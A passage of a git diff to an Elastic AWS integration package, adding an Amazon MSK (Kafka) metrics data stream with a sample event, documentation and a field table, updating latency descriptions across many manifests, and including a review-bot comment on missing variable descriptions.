+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
+ - name: tags_filter
+ type: yaml
+ title: Tags Filter
+ multi: false
+ required: false
+ show_user: false
+ default: |
+ # - key: "created-by"
+ # value: "foo"
+ - name: include_linked_accounts
+ type: bool
+ title: Include Linked Accounts
+ multi: false
+ required: false
+ show_user: false
+ default: true
+ description: When include_linked_accounts is set to true, CloudWatch metrics will be collected from both linked accounts and the monitoring account. Default is true.
+ title: AWS Kafka metrics
+ description: Collect AWS Kafka metrics
diff --git a/packages/aws/data_stream/kafka_metrics/sample_event.json b/packages/aws/data_stream/kafka_metrics/sample_event.json
new file mode 100644
index 00000000000..5862e61e1c0
--- /dev/null
+++ b/packages/aws/data_stream/kafka_metrics/sample_event.json
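Review bot: `data_granularity` and `regions` are the only vars in this stream without a `description`, so Fleet shows them with no guidance; the stream template in this diff renders `regions` as the list of regions to query, so `description: The AWS regions to collect metrics from.` fits, while `data_granularity` needs one stating its expected value format, which cannot be derived from this diff. The data stream is titled `AWS Kafka metrics` here while the new ingest pipeline describes itself as `Pipeline for Amazon MSK metrics`; naming the service consistently in `title`/`description` would help users find it. The `billing` hunk earlier in this diff adds `leaderelection` and `processors` vars; if that is meant to be uniform across the aws metrics streams, this new manifest lacks both.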
@@ -0,0 +1,90 @@
+{
+ "@timestamp": "2024-02-21T23:35:00.000Z",
+ "agent": {
+ "ephemeral_id": "0c8bf84c-f257-496d-a788-89af2b6959ae",
+ "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519",
+ "name": "docker-fleet-agent",
+ "type": "metricbeat",
+ "version": "8.11.4"
+ },
+ "aws": {
+ "cloudwatch": {
+ "namespace": "AWS/Kafka"
+ },
+ "dimensions": {
+ "ClusterName": "qa-awseuw1-cp-internal-app-2-usage-data",
+ "ConsumerGroup": "usage-data-pipeline",
+ "Topic": "usage-data-pipeline"
+ },
+ "kafka": {
+ "metrics": {
+ "EstimatedMaxTimeLag": {
+ "sum": 1
+ },
+ "MaxOffsetLag": {
+ "sum": 31
+ },
+ "SumOffsetLag": {
+ "sum": 31
+ }
+ }
+ }
+ },
+ "cloud": {
+ "account": {
+ "id": "123456789012",
+ "name": "MonitoringAccount"
+ },
+ "provider": "aws",
+ "region": "eu-west-1"
+ },
+ "data_stream": {
+ "dataset": "aws.kafka_metrics",
+ "namespace": "default",
+ "type": "metrics"
+ },
+ "ecs": {
+ "version": "8.0.0"
+ },
+ "elastic_agent": {
+ "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519",
+ "snapshot": false,
+ "version": "8.11.4"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "dataset": "aws.kafka_metrics",
+ "duration": 67075155989,
+ "ingested": "2024-02-21T23:47:52Z",
+ "module": "aws"
+ },
+ "host": {
+ "architecture": "aarch64",
+ "containerized": false,
+ "hostname": "docker-fleet-agent",
+ "id": "1b287af46f2942b3ba34c3ee5a5c6111",
+ "ip": [
+ "172.20.0.7"
+ ],
+ "mac": [
+ "02-42-AC-14-00-07"
+ ],
+ "name": "docker-fleet-agent",
+ "os": {
+ "codename": "focal",
+ "family": "debian",
+ "kernel": "6.4.16-linuxkit",
+ "name": "Ubuntu",
+ "platform": "ubuntu",
+ "type": "linux",
+ "version": "20.04.6 LTS (Focal Fossa)"
+ }
+ },
+ "metricset": {
+ "name": "cloudwatch",
+ "period": 60000
+ },
+ "service": {
+ "type": "aws"
+ }
+}
\ No newline at end of file
diff --git a/packages/aws/data_stream/kinesis/manifest.yml b/packages/aws/data_stream/kinesis/manifest.yml
index 82ea4ed8502..97f04ab7d37 100644
--- a/packages/aws/data_stream/kinesis/manifest.yml
+++ b/packages/aws/data_stream/kinesis/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/data_stream/lambda/manifest.yml b/packages/aws/data_stream/lambda/manifest.yml
index ea3d754b140..00fdba14515 100644
--- a/packages/aws/data_stream/lambda/manifest.yml
+++ b/packages/aws/data_stream/lambda/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/data_stream/natgateway/manifest.yml b/packages/aws/data_stream/natgateway/manifest.yml
index f321ee4f903..55a8853ace3 100644
--- a/packages/aws/data_stream/natgateway/manifest.yml
+++ b/packages/aws/data_stream/natgateway/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/rds/manifest.yml b/packages/aws/data_stream/rds/manifest.yml
index a52723fe299..9c6a270a38f 100644
--- a/packages/aws/data_stream/rds/manifest.yml
+++ b/packages/aws/data_stream/rds/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl b/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl
index f3740741719..d1947fa596b 100644
--- a/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl
+++ b/packages/aws/data_stream/redshift/_dev/deploy/tf/.terraform.lock.hcl
@@ -2,20 +2,23 @@
 # Manual edits may be lost in future updates.
 provider "registry.terraform.io/hashicorp/aws" {
- version = "4.18.0"
+ version = "5.39.1"
 hashes = [
- "h1:62MWy6fGx/cVk1DnLcc8rUxCCKhi6/R9fi/Af/ph9ag=",
- "zh:100a11324326bf849b4c85d3c40a81e485726eee99c5a229387b8485a7a8da8b",
- "zh:2226bbf97101af90e43cd5606d8678f35d7e7b477657d9297c42a1bd2ed42750",
- "zh:27d51694300c08c32312f8832b889c57a2821dc022d49d38f9b1e14810f8a3fb",
- "zh:2b8792c76986facfd415f967c5d61022f7ceeaa46c158037fe8939e36d954f99",
- "zh:3ea787967de772cc3a13469753080c8fa81be5aefc735d3753c7627f63c948e5",
- "zh:64d58463cbb2b93d5202ef311a101890a1e083f9587f3eabb9f2e26dd0cf8f43",
+ "h1:hQLlAd6O1LdQHy1GdWtgT5fcOlc3TWW+SaaFkpe+e8E=",
+ "zh:05c50a5d8edb3ba4ebc4eb6e0d0b5e319142f5983b27821710ed7d475d335bdc",
+ "zh:082986a5784dd21957e632371b289e549f051a4ea21d5c78c6d744c3537f03c5",
+ "zh:192ae622ba562eacc4921ed549a794506179233d724fdd15a4f147f3400724a0",
+ "zh:19a1d4637a62de90b0da174c0bf01000cd900488f7e8f709d8a37f082c59756b",
+ "zh:1d7689a8583515f1705972d7ce57ccfab96215b19905530d2c78c02dcfaff583",
+ "zh:22c446a21209a52ab74b4ba1ede0b220531e97ce479430047e493a2c45e1d8cb",
+ "zh:4154de82290ab4e9f81bac1ea62342de8b3b7a608f99258c190d4dd1c6663e47",
+ "zh:6bc4859ccdc54f28af9286b2fa090a31dcb345138d68c471510b737f6a052011",
+ "zh:73c69e000e0b321e78a4a12fef60d37285f2afec0ea7be9e06163d985101cb59",
+ "zh:890a3422f5e445b49bae30facf448d0ec9cd647e9155d0b685b5b39e9d331a94",
 "zh:9b12af85486a96aedd8d7984b0ff811a4b42e3d88dad1a3fb4c0b580d04fa425",
- "zh:b10eecf4c034a229712825124e7c0b765c5904648550dc8f844f68638531d337",
- "zh:d9a3cc46e2746c40ea69bcfb2d12e765ee6bda3e1ed8ce73f272d492ff4836bb",
- "zh:df625e57aa3b5fb3e4562da44daf6565289818ba2a7e66f86ad968b43fdb5148",
- "zh:eaaa3a5d2a15a87b346e521872120a3ca7f6777a04226a55f51022eaf4097963",
- "zh:ec6f4b00ae4f9d536f2a6c2e5a5f149867194268ce9068a9c348bc3e678fbfce",
+ "zh:9cd88bec0f5205df9032e3126d4e57edd1c5cc8d45cda25626882dafc485a3b0",
+ "zh:a3a8e3276d0fbf051bbafa192a2998b05745f2cf285ac8c36a9ad167a75c037f",
+ "zh:d47e4dcf4c0ad71b9a7c720be4f3a89f6786a82e77bbe8d950794562792a1da5",
+ "zh:f74e5b2af508c7de80a6ae5198df54a795eeba5058a0cd247828943f0c54f6e0",
 ]
 }
diff --git a/packages/aws/data_stream/redshift/manifest.yml b/packages/aws/data_stream/redshift/manifest.yml
index 64ba5350ca2..39fe2a86510 100644
--- a/packages/aws/data_stream/redshift/manifest.yml
+++ b/packages/aws/data_stream/redshift/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/s3_daily_storage/manifest.yml b/packages/aws/data_stream/s3_daily_storage/manifest.yml
index 194bd377e6c..33eec16ae63 100644
--- a/packages/aws/data_stream/s3_daily_storage/manifest.yml
+++ b/packages/aws/data_stream/s3_daily_storage/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/s3_request/manifest.yml b/packages/aws/data_stream/s3_request/manifest.yml
index ebdfb0ab649..620c188f01d 100644
--- a/packages/aws/data_stream/s3_request/manifest.yml
+++ b/packages/aws/data_stream/s3_request/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/s3_storage_lens/manifest.yml b/packages/aws/data_stream/s3_storage_lens/manifest.yml
index 20b3a423dda..fb5ac2ff489 100644
--- a/packages/aws/data_stream/s3_storage_lens/manifest.yml
+++ b/packages/aws/data_stream/s3_storage_lens/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/sns/manifest.yml b/packages/aws/data_stream/sns/manifest.yml
index 361557a3625..3dcd20a1107 100644
--- a/packages/aws/data_stream/sns/manifest.yml
+++ b/packages/aws/data_stream/sns/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/data_stream/sqs/manifest.yml b/packages/aws/data_stream/sqs/manifest.yml
index bdb5aa8f9b2..68bb5a33c43 100644
--- a/packages/aws/data_stream/sqs/manifest.yml
+++ b/packages/aws/data_stream/sqs/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/transitgateway/manifest.yml b/packages/aws/data_stream/transitgateway/manifest.yml
index ff51121e944..323551bc096 100644
--- a/packages/aws/data_stream/transitgateway/manifest.yml
+++ b/packages/aws/data_stream/transitgateway/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/usage/manifest.yml b/packages/aws/data_stream/usage/manifest.yml
index f7928fdc75f..f2dd2d0bf82 100644
--- a/packages/aws/data_stream/usage/manifest.yml
+++ b/packages/aws/data_stream/usage/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: include_linked_accounts
 type: bool
 title: Include Linked Accounts
diff --git a/packages/aws/data_stream/vpn/manifest.yml b/packages/aws/data_stream/vpn/manifest.yml
index 05eb6486c9c..c2925432279 100644
--- a/packages/aws/data_stream/vpn/manifest.yml
+++ b/packages/aws/data_stream/vpn/manifest.yml
@@ -30,7 +30,7 @@ streams:
 multi: false
 required: false
 show_user: false
- description: To address latency issues between certain AWS services and CloudWatch, specify a latency parameter to adjust the collection start time and end time in Metricbeat such as `15m`.
+ description: The 'latency' parameter adjusts the Metricbeat collection start and end times. AWS CloudWatch might experience delay in processing metrics for some services causing data points to be missed during the integration collection period. To mitigate this potential issue, specify a latency parameter such as `15m`.
 - name: tags_filter
 type: yaml
 title: Tags Filter
diff --git a/packages/aws/docs/billing.md b/packages/aws/docs/billing.md
index 4f7061c436b..1e8e96f55e2 100644
--- a/packages/aws/docs/billing.md
+++ b/packages/aws/docs/billing.md
@@ -8,6 +8,11 @@ For example, you could use this data to easily view your total estimated charges
 **IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS integration for more details.**
+## Limitations
+
+When you want to group by a combination of several tags and dimensions, like `SERVICE` along with various tags (e.g., `team`, `project`, `aws:createdBy`), you might see duplicated data. This happens because of a [limitation](https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_GetCostAndUsage.html) with the `GetCostAndUsage` API, which only allows grouping costs by two different groups.
+
+To avoid data duplication, it's recommended to aggregate data using a combination of two attributes, which can be either: one tag and one dimension, two tags or two dimensions.
 ## Data streams
diff --git a/packages/aws/docs/kafka.md b/packages/aws/docs/kafka.md
new file mode 100644
index 00000000000..842e6c5e99b
--- /dev/null
+++ b/packages/aws/docs/kafka.md
@@ -0,0 +1,240 @@ +# Amazon Managed Streaming for Apache Kafka (MSK) + +The Amazon Kafka integration allows you to monitor [Amazon MSK](https://aws.amazon.com/msk/) — it's a fully managed +service that makes it easy for you to build and run applications that use Apache Kafka to process streaming data + +Use the Amazon Kafka integration to collect metrics related to your MSK clusters from CloudWatch. This integration only +supports collecting DEFAULT level monitoring metrics for now. Once these metrics are sent to Elastic, you can visualize +them in Kibana, create alerts to notify you if something goes wrong, and reference the metrics when troubleshooting +an issue. + +**IMPORTANT: Extra AWS charges on AWS API requests will be generated by this integration. Please refer to the AWS +integration for more details.** + +## Data streams + +The Amazon Kafka integration collects one type of data: metrics. + +**Metrics** give you insight into the state of Amazon MSK. +The metrics collected by the Amazon Kafka integration include bytes received from clients, bytes sent to clients, number +of incoming messages and more. See more details in the [Metrics reference](#metrics-reference) + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +Before using any AWS integration you will need: + +* **AWS Credentials** to connect with your AWS account. +* **AWS Permissions** to make sure the user you're using to connect has permission to share the relevant data. + +For more details about these requirements, see the **AWS** integration documentation. + +## Setup + +Use this integration if you only need to collect data from the Amazon MSK service. + +If you want to collect data from two or more AWS services, consider using the **AWS** integration. 
+When you configure the AWS integration, you can collect data from as many AWS services as you'd like. + +For step-by-step instructions on how to set up an integration, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Metrics reference + +An example event for `kafka` looks as following: + +```json +{ + "@timestamp": "2024-02-21T23:35:00.000Z", + "agent": { + "ephemeral_id": "0c8bf84c-f257-496d-a788-89af2b6959ae", + "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519", + "name": "docker-fleet-agent", + "type": "metricbeat", + "version": "8.11.4" + }, + "aws": { + "cloudwatch": { + "namespace": "AWS/Kafka" + }, + "dimensions": { + "ClusterName": "qa-awseuw1-cp-internal-app-2-usage-data", + "ConsumerGroup": "usage-data-pipeline", + "Topic": "usage-data-pipeline" + }, + "kafka": { + "metrics": { + "EstimatedMaxTimeLag": { + "sum": 1 + }, + "MaxOffsetLag": { + "sum": 31 + }, + "SumOffsetLag": { + "sum": 31 + } + } + } + }, + "cloud": { + "account": { + "id": "123456789012", + "name": "MonitoringAccount" + }, + "provider": "aws", + "region": "eu-west-1" + }, + "data_stream": { + "dataset": "aws.kafka_metrics", + "namespace": "default", + "type": "metrics" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "0395c9d5-9ac1-4ecc-bfd5-fc5376847519", + "snapshot": false, + "version": "8.11.4" + }, + "event": { + "agent_id_status": "verified", + "dataset": "aws.kafka_metrics", + "duration": 67075155989, + "ingested": "2024-02-21T23:47:52Z", + "module": "aws" + }, + "host": { + "architecture": "aarch64", + "containerized": false, + "hostname": "docker-fleet-agent", + "id": "1b287af46f2942b3ba34c3ee5a5c6111", + "ip": [ + "172.20.0.7" + ], + "mac": [ + "02-42-AC-14-00-07" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "6.4.16-linuxkit", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS 
(Focal Fossa)" + } + }, + "metricset": { + "name": "cloudwatch", + "period": 60000 + }, + "service": { + "type": "aws" + } +} +``` + +**Exported fields** + +| Field | Description | Type | Metric Type | +|---|---|---|---| +| @timestamp | Event timestamp. | date | | +| agent.id | Unique identifier of this agent (if one exists). Example: For Beats this would be beat.id. | keyword | | +| aws.cloudwatch.namespace | The namespace specified when query cloudwatch api. | keyword | | +| aws.dimensions.BrokerID | Filters the metric data by broker ID. | keyword | | +| aws.dimensions.ClientAuthentication | Filters the metric data by client authentication. | keyword | | +| aws.dimensions.ClusterName | Filters the metric data by cluster name. | keyword | | +| aws.dimensions.ConsumerGroup | Filters the metric data by consumer group. | keyword | | +| aws.dimensions.Topic | Filters the metric data by topic. | keyword | | +| aws.kafka.metrics.ActiveControllerCount.sum | The total number of active controllers. Only one controller per cluster should be active at any given time. | long | gauge | +| aws.kafka.metrics.BurstBalance.avg | The average remaining balance of input-output burst credits for EBS volumes in the cluster. | long | gauge | +| aws.kafka.metrics.BytesInPerSec.sum | The total number of bytes per second received from clients in the given collection period. | long | gauge | +| aws.kafka.metrics.BytesOutPerSec.sum | The total number of bytes per second sent to clients in the given collection period. | long | gauge | +| aws.kafka.metrics.CPUCreditBalance.avg | The average number of earned CPU credits that a broker has accrued since it was launched. | long | gauge | +| aws.kafka.metrics.ClientConnectionCount.sum | The total number of active authenticated client connections. | long | gauge | +| aws.kafka.metrics.ConnectionCount.sum | The total number of active authenticated, unauthenticated, and inter-broker connections. 
| long | gauge | +| aws.kafka.metrics.CpuIdle.avg | The average percentage of CPU idle time. | long | gauge | +| aws.kafka.metrics.CpuIoWait.avg | The average percentage of CPU idle time during a pending disk operation. | long | gauge | +| aws.kafka.metrics.CpuSystem.avg | The average percentage of CPU in kernel space. | long | gauge | +| aws.kafka.metrics.CpuUser.avg | The average percentage of CPU in user space. | long | gauge | +| aws.kafka.metrics.EstimatedMaxTimeLag.sum | The total time estimate (in seconds) to drain MaxOffsetLag in the given collection period. | long | gauge | +| aws.kafka.metrics.FetchMessageConversionsPerSec.sum | The total number of fetch message conversions per second for the topic in the given collection period. | long | gauge | +| aws.kafka.metrics.GlobalPartitionCount.sum | The total number of partitions across all topics in the cluster, excluding replicas. | long | gauge | +| aws.kafka.metrics.GlobalTopicCount.sum | The total number of topics across all brokers in the cluster. | long | gauge | +| aws.kafka.metrics.HeapMemoryAfterGC.avg | The average percentage of total heap memory in use after garbage collection. | long | gauge | +| aws.kafka.metrics.KafkaAppLogsDiskUsed.avg | The average percentage of disk space used for application logs. | long | gauge | +| aws.kafka.metrics.KafkaDataLogsDiskUsed.avg | The average percentage of disk space used for data logs. | long | gauge | +| aws.kafka.metrics.LeaderCount.sum | The total number of leaders of partitions per broker, not including replicas. | long | gauge | +| aws.kafka.metrics.MaxOffsetLag.sum | The total maximum offset lag across all partitions in a topic in the given collection period. | long | gauge | +| aws.kafka.metrics.MemoryBuffered.avg | The average size in bytes of buffered memory for the broker. | long | gauge | +| aws.kafka.metrics.MemoryCached.avg | The average size in bytes of cached memory for the broker. 
| long | gauge | +| aws.kafka.metrics.MemoryFree.avg | The average size in bytes of memory that is free and available for the broker. | long | gauge | +| aws.kafka.metrics.MemoryUsed.avg | The average size in bytes of memory that is in use for the broker. | long | gauge | +| aws.kafka.metrics.MessagesInPerSec.sum | The total number of incoming messages per second for the broker in the given collection period. | long | gauge | +| aws.kafka.metrics.NetworkRxDropped.sum | The total number of dropped receive packages. | long | counter | +| aws.kafka.metrics.NetworkRxErrors.sum | The total number of network receive errors for the broker. | long | counter | +| aws.kafka.metrics.NetworkRxPackets.sum | The total number of packets received by the broker. | long | counter | +| aws.kafka.metrics.NetworkTxDropped.sum | The total number of dropped transmit packages. | long | counter | +| aws.kafka.metrics.NetworkTxErrors.sum | The total number of network transmit errors for the broker. | long | counter | +| aws.kafka.metrics.NetworkTxPackets.sum | The total number of packets transmitted by the broker. | long | counter | +| aws.kafka.metrics.OfflinePartitionsCount.avg | The average number of partitions that are offline in the cluster. | long | gauge | +| aws.kafka.metrics.PartitionCount.avg | The average number of topic partitions per broker, including replicas. | long | gauge | +| aws.kafka.metrics.ProduceMessageConversionsPerSec.sum | The total number of produce message conversions per second for the topic in the given collection period. | long | gauge | +| aws.kafka.metrics.ProduceTotalTimeMsMean.avg | The mean produce time in milliseconds. | long | gauge | +| aws.kafka.metrics.RequestBytesMean.avg | The mean number of request bytes for the broker. | long | gauge | +| aws.kafka.metrics.RequestTime.avg | The average time in milliseconds spent in broker network and I/O threads to process requests. 
| long | gauge | +| aws.kafka.metrics.RootDiskUsed.avg | The average percentage of the root disk used by the broker. | long | gauge | +| aws.kafka.metrics.SumOffsetLag.sum | The total aggregated offset lag for all the partitions in a topic. | long | gauge | +| aws.kafka.metrics.SwapFree.avg | The average size in bytes of swap memory that is available for the broker. | long | gauge | +| aws.kafka.metrics.SwapUsed.avg | The size in bytes of swap memory that is in use for the broker. | long | gauge | +| aws.kafka.metrics.TrafficShaping.avg | The average number of packets shaped (dropped or queued) due to exceeding network allocations. | long | gauge | +| aws.kafka.metrics.UnderMinIsrPartitionCount.avg | The average number of under minIsr partitions for the broker. | long | gauge | +| aws.kafka.metrics.UnderReplicatedPartitions.avg | The average number of under-replicated partitions for the broker. | long | gauge | +| aws.kafka.metrics.ZooKeeperRequestLatencyMsMean.avg | The mean latency in milliseconds for Apache ZooKeeper requests from broker. | long | gauge | +| aws.tags | Tag key value pairs from aws resources. | flattened | | +| cloud | Fields related to the cloud or infrastructure the events are coming from. | group | | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | | +| cloud.account.name | The cloud account name or alias used to identify different entities in a multi-tenant environment. Examples: AWS account name, Google Cloud ORG display name. | keyword | | +| cloud.availability_zone | Availability zone in which this host, resource, or service is located. | keyword | | +| cloud.image.id | Image ID for the cloud instance. | keyword | | +| cloud.instance.id | Instance ID of the host machine. | keyword | | +| cloud.instance.name | Instance name of the host machine. 
| keyword | | +| cloud.machine.type | Machine type of the host machine. | keyword | | +| cloud.project.id | The cloud project identifier. Examples: Google Cloud Project id, Azure Project id. | keyword | | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | | +| cloud.region | Region in which this host, resource, or service is located. | keyword | | +| container.id | Unique container id. | keyword | | +| container.image.name | Name of the image the container was built on. | keyword | | +| container.labels | Image labels. | object | | +| container.name | Container name. | keyword | | +| data_stream.dataset | Data stream dataset. | constant_keyword | | +| data_stream.namespace | Data stream namespace. | constant_keyword | | +| data_stream.type | Data stream type. | constant_keyword | | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | | +| error | These fields can represent errors of any kind. Use them for errors that happen while fetching events or in cases where the event itself contains an error. | group | | +| error.message | Error message. | match_only_text | | +| event.dataset | Name of the dataset. If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. | constant_keyword | | +| event.module | Event module | constant_keyword | | +| host.architecture | Operating system architecture. | keyword | | +| host.containerized | If the host is a container. | boolean | | +| host.domain | Name of the domain of which the host is a member. 
For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | | +| host.ip | Host ip addresses. | ip | | +| host.mac | Host MAC addresses. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword | | +| host.name | Name of the host. It can contain what hostname returns on Unix systems, the fully qualified domain name (FQDN), or a name specified by the user. The recommended value is the lowercase FQDN of the host. | keyword | | +| host.os.build | OS build information. | keyword | | +| host.os.codename | OS codename, if any. | keyword | | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | | +| host.os.name | Operating system name, without the version. | keyword | | +| host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | | +| host.os.version | Operating system version as a raw string. | keyword | | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | +| service.type | The type of the service data is collected from. 
